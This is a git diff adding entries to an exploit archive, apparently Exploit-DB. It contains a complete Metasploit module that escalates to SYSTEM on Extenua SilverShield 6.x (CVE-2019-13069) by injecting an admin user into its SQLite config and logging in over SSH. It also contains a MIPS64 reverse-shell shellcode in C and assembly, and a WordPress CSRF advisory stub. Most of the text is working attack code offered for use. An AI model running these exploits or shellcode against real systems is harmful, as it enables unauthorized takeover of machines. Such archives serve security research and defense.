diff --git a/exploits/multiple/local/47197.rb b/exploits/multiple/local/47197.rb
new file mode 100755
index 000000000..a34fc710c
--- /dev/null
+++ b/exploits/multiple/local/47197.rb
@@ -0,0 +1,343 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# Exploit Title: extenua SilverSHielD 6.x local priviledge escalation
+# Google Dork: na
+# Date: 31 Jul 2019
+# Exploit Author: Ian Bredemeyer
+# Vendor Homepage: https://www.extenua.com
+# Software Link: https://www.extenua.com/silvershield
+# Version: 6.x
+# Tested on: Windows7 x64, Windows7 x86, Windows Server 2012 x64, Windows10 x64, Windows Server 2016 x64
+# CVE: CVE-2019-13069
+
+# More Info: https://www.fobz.net/adv/ag47ex/info.html
+
+require 'sqlite3'
+require 'net/ssh'
+require 'net/ssh/command_stream'
+require 'tempfile'
+require 'securerandom'
+require 'digest'
+
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = GoodRanking
+
+ include Post::File
+ include Msf::Exploit::Remote::SSH
+ include Msf::Post::Windows::Services
+ include Msf::Post::Windows::FileInfo
+
+ def initialize(info={})
+ super( update_info(info,
+ 'Name' => 'Extenua SilverSHielD 6.x local privilege escalation',
+ 'Description' => %q{
+ Extenua SilverShield 6.x fails to secure its ProgramData subfolder.
+ This module exploits this by injecting a new user into the database and then
+ using that user to login the SSH service and obtain SYSTEM.
+ This results in to FULL SYSTEM COMPROMISE.
+ At time of discolsure, no fix has been issued by vendor.
+ },
+ 'Author' => [
+ 'Ian Bredemeyer',
+ ],
+ 'Platform' => [ 'win','unix' ], # 'unix' is needed, otherwise the Payload is flagged as incompatible
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Targets' => [
+ [ 'Universal', {} ],
+ ],
+ 'Payload' =>
+ {
+ 'Compat' => {
+ 'PayloadType' => 'cmd_interact',
+ 'ConnectionType' => 'find',
+ },
+ },
+ 'DefaultTarget' => 0,
+ 'References' => [
+ [ 'CVE', '2019-13069' ],
+ [ 'URL', 'https://www.fobz.net/adv/ag47ex/info.html' ],
+ [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13069' ]
+ ],
+ 'DisclosureDate'=> "Jul 31 2019",
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+ ))
+
+ register_options([
+ OptPort.new('PF_PORT', [ true, 'Local port to PortFwd to victim', 20022 ]),
+ OptString.new('SS_IP', [ false, 'IP address SilverShield is listening on at the victim. Leave blank to detect.', '' ]),
+ OptPort.new('SS_PORT', [ false, 'Port SilverShield is listening on at the victim. Leave at 0 to detect.', 0 ]),
+ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+ OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 15])
+ ])
+ end
+
+
+
+ # Grabbed this bit from another exploit I was pulling apart... Need to trick the SSH session a bit
+ module ItsAShell
+ def _check_shell(*args)
+ true
+ end
+ end
+
+
+
+ # helper methods that normally come from Tcp
+ def rhost
+ return '127.0.0.1'
+ end
+ def rport
+ datastore['PF_PORT']
+ end
+
+
+
+ # Does a basic check of SilverShield... Does not fail if there is a problem, but will return false
+ def do_check_internal()
+
+ looks_ok = true # lets assume everything is OK...
+
+ # Try to get the path of the SilverShield service...
+ ss_serviceinfo = service_info("SilverShield")
+ ss_servicepath = ss_serviceinfo[:path]
+ if (ss_servicepath == '')
+ print_warning("Vulnerable Silvershield service is likely NOT running on the target system")
+ looks_ok = false
+ else
+ print_good("Silvershield service found: " + ss_servicepath)
+ end
+
+
+ # Try to read the version of Silvershield from the resigstry of the victim...
+ ss_version = ""
+ begin
+ ss_version = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\\extenua\\SilverShield', KEY_READ).query_value("Version").data
+ rescue ::Exception => e
+ print_warning "Cannot find SilverShield version in registry. Victim may not have vulnerable SilverShield installed"
+ looks_ok = false
+ end
+ if ss_version != ""
+ print_good("Silvershield version from registry: " + ss_version)
+ if ss_version[0..1] != "6." # If not version "6." something ? then this will not work...
+ print_warning("This version is not likely vulnerable to this module")
+ looks_ok = false
+ end
+ end
+ return looks_ok
+
+ end
+
+
+
+
+ # Attempts a single SSH login to the victim via the local port forwarded to fictim. Returns valid connection if OK
+ def do_login()
+ factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
+ opt_hash = {
+ :auth_methods => ['password'],
+ :port => rport,
+ :use_agent => false,
+ :config => false,
+ :proxy => factory,
+ :password => @@the_password,
+ :non_interactive => true,
+ :verify_host_key => :never
+ }
+ opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+ begin
+ ssh_socket = nil
+ ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+ ssh_socket = Net::SSH.start(rhost, 'haxor4', opt_hash)
+ end
+ rescue Rex::ConnectionError
+ return
+ rescue Net::SSH::Disconnect, ::EOFError
+ print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+ return
+ rescue ::Timeout::Error
+ print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+ return
+ rescue Net::SSH::AuthenticationFailed
+ print_error "#{rhost}:#{rport} SSH - Failed authentication"
+ rescue Net::SSH::Exception => e
+ print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+ return
+ end
+
+ if ssh_socket
+ # Create a new session from the socket, then dump it.
+ conn = Net::SSH::CommandStream.new(ssh_socket)
+ ssh_socket = nil
+ return conn
+ else
+ return false
+ end
+ end
+
+
+
+ # Attempts several times to connect through session back to SilverShield as haxor then open resulting shell as a new session.
+ def exploit_sub
+ x = 0
+ while x < 5 do
+ x = x + 1
+ print_status "SSH login attempt " + x.to_s + ". May take a moment..."
+
+ conn = do_login()
+ if conn
+ print_good "Successful login. Passing to handler..."
+ handler(conn.lsock)
+ return true
+ end
+ end
+ return false
+ end
+
+
+
+ def check()
+ if do_check_internal
+ Exploit::CheckCode::Appears
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+
+
+ # The guts of it...
+ def exploit
+
+ # Some basic setup...
+ payload_instance.extend(ItsAShell)
+ factory = ssh_socket_factory
+
+
+ # Do a quick check... well, sort of, just shows info. We won't stop, just report to user...
+ do_check_internal()
+
+
+ # We will generate a NEW password and salt. Then get the relevant hash to inject...
+ @@the_password = SecureRandom.hex
+ @@the_password_salt = SecureRandom.hex[0..7]
+ @@the_password_hash = Digest::MD5.hexdigest @@the_password_salt + @@the_password
+ vprint_status("generated- user:haxor4 password:" + @@the_password + " salt:" + @@the_password_salt + " => hash(md5):" + @@the_password_hash)
+
+
+ # Get a tempfile on the local system. Garbage collection will automaticlly kill it off later...
+ # This is a temp location where we will put the sqlite database so we can work on it on the local machine...
+ tfilehandle = Tempfile.new('ss.db.')
+ tfilehandle.close
+ wfile = tfilehandle.path
+
+
+ #Try to get the ProgramData path from the victim, this is where the SQLite databasae is held...
+ progdata = session.fs.file.expand_path("%ProgramData%") # client.sys.config.getenv('PROGRAMDATA')
+ print_status 'Remote %ProgramData% = ' + progdata
+
+
+ # Lets check the file exists, then download from the victim to the local file system...
+ filecheck = progdata + '\SilverShield\SilverShield.config.sqlite'
+ fsrc = filecheck
+ fdes = wfile
+ print_status 'Try download: ' + fsrc + ' to: ' + fdes
+ begin
+ ::Timeout.timeout(5) do
+ session.fs.file.download_file(fdes, fsrc)
+ end
+ rescue ::Exception => e
+ print_error "Cannot download #{fsrc} to #{fdes} #{e.class} : #{e.message}"
+ print_error "Does victim even have vulnerable SilverShield installed ?"
+ fail_with(Failure::Unknown, "Fail download")
+ end
+
+
+ # Try to connect with sqlite locally...
+ vprint_status 'Trying to open database ' + wfile
+ db = SQLite3::Database.open wfile
+
+
+ # Remove haxor4 if its already there, just incase by pure chance a user with that name already exists...
+ vprint_status 'remove user "haxor4" if its already in there...'
+ results = db.execute "delete from USERS where vcusername='haxor4'"
+ answer = ""
+ results.each { |row| answer = answer + row.join(',') }
+
+
+ # Insert the haxor user... we will use this later to connect back in as SYSTEM
+ vprint_status 'insert user "haxor4" with password "' + @@the_password + '" into database'
+ results = db.execute "INSERT INTO USERS (CUSERID, VCUSERNAME, CSALT,CPASSWORD, VCHOMEDIR, BGETFILE, BPUTFILE, BDELFILE, BMODFILE, BRENFILE, BLISTDIR, BMAKEDIR, BDELDIR, BRENDIR, IAUTHTYPES, BAUTHALL, BALLOWSSH, BALLOWSFTP, BALLOWFWD, BALLOWDAV, IACCOUNTSTATUS, BAUTODISABLE, DTAUTODISABLE, BWINPASSWD, BISADMIN)VALUES(\"{11112222-3333-4444-5555666677778888}\",\"haxor4\",\"" + @@the_password_salt + "\",\"" + @@the_password_hash + "\",\"c:\\\",1,1,1,1,1,1,1,1,1,20,0,1,0,0,0,0,0,-700000.0, 0, 1);"
+ answer = ""
+ results.each { |row| answer = answer + row.join(',') }
+ print_good 'user inserted OK'
+
+
+ # Dump out local port that SilverShield has been configured to listen on at the victim machine...
+ results = db.execute "select IPORT from maincfg"
+ answer = ""
+ results.each { |row| answer = answer + row.join(',') }
+ ss_port = answer
+ print_status "SilverShield config shows listening on port: " + ss_port
+ if (datastore['SS_PORT'] != 0)
+ ss_port = datastore['SS_PORT'].to_s
+ print_status "SS_PORT setting forcing port to " + ss_port
+ end
+ if (ss_port == '')
+ ss_port = '22'
+ end
+
+
+ # Dump out local IP that SilverShield has been configured to listen on at the victim machine...
+ results = db.execute "select CBINDIP from maincfg"
+ answer = ""
+ results.each { |row| answer = answer + row.join(',') }
+ ss_ip = answer
+ print_status "SilverShield config shows listening on local IP: " + ss_ip
+ if (datastore['SS_IP'] != '')
+ ss_ip = datastore['SS_IP']
+ print_status "SS_IP setting forcing IP to " + ss_ip
+ end
+ # If the override AND the detection have come up with nothing, then use the default 127.0.0.1
+ if (ss_ip == '')
+ ss_ip = '127.0.0.1'
+ end
+
+
+ # Close the database. Keep it neat
+ db.close
+
+
+ # Now lets upload this file back to the victim...due to bad folder permissions, we can sneak our bad config back in. Yay
+ fdes = filecheck
+ fsrc = wfile
+ print_status 'Sending modded file back to victim'
+ begin
+ ::Timeout.timeout(5) do
+ session.fs.file.upload_file(fdes, fsrc)
+ end
+ rescue ::Exception => e
+ print_error "Cannot upload #{fsrc} to #{fdes} #{e.class} : #{e.message}"
+ print_error "Perhaps this server is not vulnerable or has some other mitigation."
+ fail_with(Failure::Unknown, "Fail upload")
+ end
+ sleep 4 # wait a few seconds... this gives the SilverShield service some time to see the settings have changed.
+
+
+ # Delete the port if its already pointing somewhwere... This a bit ugly and may generate an error, but I don't care.
+ client.run_cmd("portfwd delete -l " + datastore['PF_PORT'].to_s)
+
+
+ # Forward a local port through to the ssh port on the victim.
+ client.run_cmd("portfwd add -l " + datastore['PF_PORT'].to_s + " -p " + ss_port + " -r " + ss_ip)
+
+
+ # Now do ssh work and hand off the session to the handler...
+ exploit_sub
+
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47295.html b/exploits/php/webapps/47295.html
new file mode 100644
index 000000000..5948e4e44
--- /dev/null
+++ b/exploits/php/webapps/47295.html
@@ -0,0 +1,25 @@
+# Exploit Title: CSRF vulnerabilities in WP Add Mime Types Plugin <= 2.2.1
+# Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
+# Date: 18 july, 2019
+# Exploit Author: Princy Edward
+# Exploit Author Blog : https://prinyedward.blogspot.com/
+# Vendor Homepage: https://wordpress.org/plugins/wp-add-mime-types/
+# Software Link: https://downloads.wordpress.org/plugin/wp-add-mime-types.2.2.1.zip
+# Version: 2.2.1
+# Tested on: Apache/2.2.24 (CentOS)
+# CVE : Fresh
+
+#About Plugin
+The plugin additionally allows the mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions.
+#Vulnerable Description
+WordPress plugin WP Add Mime Types plugin 2.2.1 vulnerable to CWE-352.
+## CSRF Code
+Share this malicious link to the plugin user. Once he clicks the link, the mime type will automatically get updated. Here I shared a POC to allow exe files(application/x-msdownload) to be uploaded.
+
+
+
+
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7fa453b14..c7686fef7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10656,6 +10656,7 @@ id,file,description,date,author,type,platform,port
47173,exploits/multiple/local/47173.sh,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)",2019-01-13,bcoles,local,multiple,
47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
+47197,exploits/multiple/local/47197.rb,"SilverSHielD 6.x - Local Privilege Escalation",2019-08-01,"Ian Bredemeyer",local,multiple,
47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
@@ -41653,3 +41654,4 @@ id,file,description,date,author,type,platform,port
47289,exploits/php/webapps/47289.txt,"Neo Billing 3.5 - Persistent Cross-Site Scripting",2019-08-19,n1x_,webapps,php,80
47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
+47295,exploits/php/webapps/47295.html,"WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 831e71cfb..8a1556c3e 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -996,6 +996,7 @@ id,file,description,date,author,type,platform
47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
-47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind Shell (/bin/sh) with Configurable Password Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
-47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47291,shellcodes/linux_x86-64/47291.c,"Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
47292,shellcodes/linux_x86-64/47292.c,"Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)",2019-08-19,"Gonçalo Ribeiro",shellcode,linux_x86-64
+47296,shellcodes/linux/47296.c,"Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)",2019-08-20,antonio,shellcode,linux
diff --git a/shellcodes/linux/47296.c b/shellcodes/linux/47296.c
new file mode 100644
index 000000000..8b14c90f1
--- /dev/null
+++ b/shellcodes/linux/47296.c
@@ -0,0 +1,113 @@
+/*
+ * # Reverse shell shellcode for Linux MIPS64 (mips64el)
+ * # Default port: tcp/4444
+ * # Host: localhost
+ * # Date: August 19 - 2019
+ * # Author: Antonio de la Piedra
+ * # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta
+ * # Size: 157 bytes
+ * # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g
+ */
+
+#include
+#include
+
+/*
+.text
+ .global __start
+__start:
+
+ dli $s4, -3
+ dli $s5, -17
+ nor $a0,$s4,$zero
+ nor $a1,$s4,$zero
+ slti $a2,$zero,-1
+ li $v0,5040
+ syscall 0x40404
+
+ sw $v0, -32($sp)
+ lw $a0, -32($sp)
+
+ nor $t0,$s4,$zero
+ sw $t0, -12($sp)
+ dli $t2,0x5c11
+ sw $t2,-10($sp)
+ dli $t1,0x0101017f
+ sw $t1,-8($sp)
+ daddiu $a1,$sp,-12
+ nor $a2,$s5,$zero
+ dli $v0,5041
+ syscall 0x40404
+
+ nor $a1,$s4,$zero
+ dli $s0, -1
+loop:
+ dli $v0,5032
+ syscall 0x40404
+ daddi $a1,$a1,-1
+ bne $a1,$s0,loop
+ dli $t0,0x69622f2f
+ sw $t0,-12($sp)
+ dli $t1,0x68732f6e
+ dli $t1,0x68732f6e
+ sw $t1,-8($sp)
+ sw $zero,-4($sp)
+ daddiu $a0,$sp,-12
+ slti $a1,$zero,-1
+ slti $a2,$zero,-1
+ dli $v0,5057
+ syscall 0x40404
+.align 8
+*/
+
+unsigned char code[] =
+ "\xfd\xff\x14\x24"
+ "\xfd\xff\x14\x24"
+ "\xef\xff\x15\x24"
+ "\x27\x20\x80\x02"
+ "\x27\x28\x80\x02"
+ "\xff\xff\x06\x28"
+ "\xb0\x13\x02\x24"
+ "\x0c\x01\x01\x01"
+ "\xe0\xff\xa2\xaf"
+ "\xe0\xff\xa4\x8f"
+ "\x27\x60\x80\x02"
+ "\xf4\xff\xac\xaf"
+ "\x11\x5c\x0e\x24"
+ "\xf6\xff\xae\xaf"
+ "\x01\x01\x0d\x3c"
+ "\x7f\x01\xad\x35"
+ "\xf8\xff\xad\xaf"
+ "\xf4\xff\xa5\x67"
+ "\x27\x30\xa0\x02"
+ "\xb1\x13\x02\x24"
+ "\x0c\x01\x01\x01"
+ "\x27\x28\x80\x02"
+ "\xff\xff\x10\x24"
+ "\xa8\x13\x02\x24"
+ "\x0c\x01\x01\x01"
+ "\xff\xff\xa5\x60"
+ "\xfc\xff\xb0\x14"
+ "\x62\x69\x0c\x3c"
+ "\x2f\x2f\x8c\x35"
+ "\xf4\xff\xac\xaf"
+ "\x73\x68\x0d\x3c"
+ "\x6e\x2f\xad\x35"
+ "\xf8\xff\xad\xaf"
+ "\xfc\xff\xa0\xaf"
+ "\xf4\xff\xa4\x67"
+ "\xff\xff\x05\x28"
+ "\xff\xff\x06\x28"
+ "\xc1\x13\x02\x24"
+ "\x0c\x01\x01\x01";
+
+int main(int argc, char ** argv)
+{
+ void(*s)(void);
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ s = code;
+ s();
+
+}
\ No newline at end of file